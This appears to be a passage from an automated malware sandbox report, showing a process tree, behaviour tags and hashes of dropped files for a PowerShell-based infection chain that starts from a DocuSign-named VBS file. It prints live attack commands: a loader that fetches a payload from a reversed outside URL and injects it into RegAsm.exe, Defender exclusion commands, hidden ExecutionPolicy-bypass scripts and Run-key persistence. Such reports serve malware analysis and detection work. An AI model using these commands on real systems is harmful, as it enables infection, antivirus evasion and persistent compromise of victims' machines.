'[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.b/moc.nucnacnegaminoc//:sptth'' , $sNwoM , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1308
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3348
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            5⤵
              PID:4056
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gaduf.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:2056
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gaduf.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1612
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gaduf.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2240
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:3224
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3992
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1104
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cikak.ps1"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4376
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\pesister.ps1"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:264
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps1
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4292
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4076
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:936
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3440
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2340
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4928
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1580
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1572
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:868
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:704
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3808
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 624
                  7⤵
                  • Program crash
                  PID:1580
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs"
              5⤵
                PID:4392
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3808 -ip 3808
        1⤵
          PID:1244

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cikak.ps1
          Filesize

          1.2MB

          MD5

          b90ec70bbca61d24cb7099a4c31b7244

          SHA1

          7475cae19c0940c059db9e53da2036bc37d7861d

          SHA256

          9911aa6de1fc5d08c3484edd67b7e2203ad45e966452b05cce6ca144ce224999

          SHA512

          e6ec8bc839e2ad228f91ef9e69a0937e9c8b2c25b938b36d6e7a25c149cb3f710b358dbc8b82fe7581b254e4b9e625df7baba36760fc54263221aabb46d160a3

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gaduf.ps1
          Filesize

          426B

          MD5

          d31330d8f5f6082f17f5486feff028fa

          SHA1

          5813e53aa57c3488599e742d85be3f698328659b

          SHA256

          e040152d83f083fd392807ef3904ee3911fa30f2ca0c45d14ae5b92b8461d9d7

          SHA512

          424563dedc64e9ead21dcb597fb8b769143c9a79f0ca3661cd64066f490c4a3d6b9c874f2732c12020ab5a351892695c6a5b22ce8fc01a19efcf622f8ae03366

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1
          Filesize

          431B

          MD5

          e5b4f8fd90bca6194aa570d3109dd605

          SHA1

          846f63421ca8e9abce41d49086585bbd157bfc13

          SHA256

          e297dadfdf1d59d8b557e872feae9858f70b39c67e7fa61f1c6a79823c22e4cb

          SHA512

          eda0dfa8ce8c2ac0a5d76892e3f5e61d57f8c4050c2cd1ee63d22748b0e01ae3a25b490dd812a802874a0f6c40d281bc85241f3baf1d1e85bbbbf0fac896cd21

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          5a92512a32b568c5b0884526dfa7bd5c

          SHA1

          21d18deb000651ac9d78e8d7908b04bb3dc26506

          SHA256

          47218d470ca6b739da559442b1b887201839a29b3b9c5fb4ad3595f1a3de1f2c

          SHA512

          c80bd6b43389fe2047797e18ea52e6ae4c2e08fa173a130d39bd344eeb70b75edbd33b6d3d35efdf1e5fcf84be5eaea87b21362c2e0dd6eef08af200afb11c75

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          b11c8ba80a6e904e0615d2310256fb06

          SHA1

          995957000efced72f19f9d924cbf8e23b3d1c3ab

          SHA256

          441a732dabe0a1226640d8469d52010aedb10693b1809ec7d0ef972376d9cf22

          SHA512

          97b745ef49130d1182f788ebca5fbcbd607b11c67ff8cf5608a249182fdff298f3690efda826051b128b461bbb1046f1269db85ade371675a53852ffc3db58f1

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          d096831023867930e62e6d8b3d4d8ca6

          SHA1

          404a1e73dc1590f1c8b9327c396591567dac7365

          SHA256

          167f75b42ae614a8d6b0497779ff12f09605328533487f235b029e0db03ad23b

          SHA512

          31333100ddd8e04bf730118ea800843720c0f3fb69e27b89dda7fa4d717d25e838ad55a0919d47a44dd8a78d724ef8c105cfa230987cc46ba94a2b790ff91b75

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          948B

          MD5

          217d9191dfd67252cef23229676c9eda

          SHA1

          80d940b01c28e3933b9d68b3e567adc2bac1289f

          SHA256

          e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

          SHA512

          86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          50a8221b93fbd2628ac460dd408a9fc1

          SHA1

          7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

          SHA256

          46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

          SHA512

          27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          c4e53028000e62a0fe87ed7f52292e82

          SHA1

          0ba4a92b11557cf5356d9ca9beba781a2a1815c2

          SHA256

          7b49076f973e9924924ba8e970af30eb3e557d9f5f18302c42bb2ff9e955fbcf

          SHA512

          8180c5d54335ddad9d1a656b529441d7f2ec83c210f26493467fb84e8e0819e093a15fe01d39b7028f49b5b14adab0cc19f9f962e6b9a44172aa841cee29061f

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          d49246229b2077d7961ee5c90e0945f8

          SHA1

          8b50bbdbc82b00f545510bc3ea9e8cd96182fa79

          SHA256

          581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c

          SHA512

          5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          a68fcc3482ebb381cd7eb80d4dfc7ac9

          SHA1

          68f694b1b7999996678244d8ef9d95f520ec2e39

          SHA256

          1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0

          SHA512

          a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          012245604d1f9b30879904558e292da8

          SHA1

          e48ed6db7b52f6de8287fc5d7f6ea100326adfdc

          SHA256

          0f7c853bc431a078e6c661be3ac34d9bd0d2ac533f49eda183887122dfc02f0c

          SHA512

          78506118229cbcd2195b029912e769d1e2715471a24431a772c7a663493c9dccef8738bae29ca8ac0d227a2ace3f902fd9ec018fa5be3faa137efe19c1c51d10

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          7838adf31d802010830724fc199fd4db

          SHA1

          c8a55e5dffe362ed197ca285722742118e877f8c

          SHA256

          15aff9809598d1f49c70a220da9ab58aeedcf86d0f56f3d335f6f2c9e24de15e

          SHA512

          cd9b8112a6b94ec73f06b620544f60cac8186e3ac1e5f244eb083892acca55f0281b56399866b840e9de3f8dd32366d2539e8daf884d0bde069d8f393b9e2a23

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          471ce76847e13cf97cf882a5c41a8363

          SHA1

          79b11c6bbe9c8af88b4027267e02885061a364af

          SHA256

          5599f4a86f6ef1e750cf748809de82241ab9f65e1762f402c6b65b6de3bd1b2e

          SHA512

          c13334b4c6bd8ee0eb910f4f1473f99b882c5f658a33d8be2c7bf7fed7201553fcf56029d5871310a477ab147eb6428fef963fce5bc0722165db40cfb630aa8b

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          693baf43e3d5fefa0883380c7a77c69a

          SHA1

          f3e6115432504e8bd401d8c0ff2da43e708707e5

          SHA256

          27a3015931d1f72ce982cf8f9d38dc99219ea2bb9bda4ec7b09dca9bd1122e9e

          SHA512

          29c5e093f3f86c38246fe5f1c5d6110f315937916f139289f52dbbb1e67d4f5f46e4cc928ff03ce19b91cf1d8310d40dadc65812399829da8c94f0c6f9e3f5cc

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          6c47b3f4e68eebd47e9332eebfd2dd4e

          SHA1

          67f0b143336d7db7b281ed3de5e877fa87261834

          SHA256

          8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

          SHA512

          0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\DLL01.txt
          Filesize

          31B

          MD5

          951386ce4b2d0dd2077125fb0d2c5fb2

          SHA1

          2ed5db7ef27b9ca9654c4baaf62498d517d73eca

          SHA256

          612fa030dc132ad86fd042c6d5ec0bc0881d5172c91d1a3ecabc0471fc8200f2

          SHA512

          4dffbbdf2d7ee7b8ed83149814cffe71d85c8fdcccb60f192d5b2e9b1e69bdfcab2b6d8cdee0a0c1e66eb851e27ecead494d2594c84801b6648f4794fe6f0fe5

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3jiza34.reu.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\dll02.txt
          Filesize

          58KB

          MD5

          1c9a162501d99eeafdec7cef54b38834

          SHA1

          e6f04b12750a692e58e242c228b24dbc1035b8d7

          SHA256

          38d36e31eb84ceda28f3ed70a66563e6bf4da3c2dc3dfa47a5b60633dcc146fb

          SHA512

          9f5c9979f77fed6b3d095ae11d490950ed59cd41b4226e74ee3ce81cca53d56c8e37ba429410aa7eea2aa82c3bf69e0dae4e459f133f93e5c617e6966662d78f

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          Filesize

          888B

          MD5

          3561af8806c5825d85e8b8572d11f4b7

          SHA1

          ed2c4c2d81c11cbc9ab16c545504dcd21a66f057

          SHA256

          1b541fd422e2094c9477bb5cc44bedb4c32027e444b5cb8e0ee22f9d5da5ae49

          SHA512

          bdb2f43a2fa664cd71e29254cbd07f967120ebab582412440f8f88335ca45ba4bd917764c6ef860346f51b999d7e1cae4437bc477ae2bbed69b0a6ce681c4aaf

          Download Submit

        • C:\Users\Admin\AppData\Roaming\pesister.ps1
          Filesize

          231B

          MD5

          f3ab1b5ce3c172217a5552713d7cf8bb

          SHA1

          d6fe9fdf07c103dbc111de9f70e6d3a82ebaf098

          SHA256

          76b0abbd36ba303f5195444356380afcac3b4394aec1a9b0e2c5ba68bc9fc1d5

          SHA512

          d7f4675ad52474ef2f83d7cf0acca823e92bb485919ac7c52bef1987f3017ca0870fd2c69c2c24135996e98bd7c3d653f2def758840e045d4e73846a3c324661

          Download Submit

        • memory/3808-140-0x0000000000400000-0x0000000000455000-memory.dmp

          Filesize

          340KB

          Download

        • memory/3808-144-0x0000000000400000-0x0000000000455000-memory.dmp

          Filesize

          340KB

          Download

        • memory/3808-142-0x0000000000400000-0x0000000000455000-memory.dmp

          Filesize

          340KB

          Download

        • memory/4376-129-0x00000212B5FE0000-0x00000212B5FEA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/5008-37-0x0000015369910000-0x000001536991A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/5112-0-0x00007FFA8A943000-0x00007FFA8A945000-memory.dmp

          Filesize

          8KB

          Download

        • memory/5112-104-0x00007FFA8A940000-0x00007FFA8B401000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5112-83-0x00007FFA8A943000-0x00007FFA8A945000-memory.dmp

          Filesize

          8KB

          Download

        • memory/5112-12-0x00007FFA8A940000-0x00007FFA8B401000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5112-11-0x00007FFA8A940000-0x00007FFA8B401000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5112-117-0x00007FFA8A940000-0x00007FFA8B401000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5112-1-0x00000264D1DD0000-0x00000264D1DF2000-memory.dmp

          Filesize

          136KB

          Download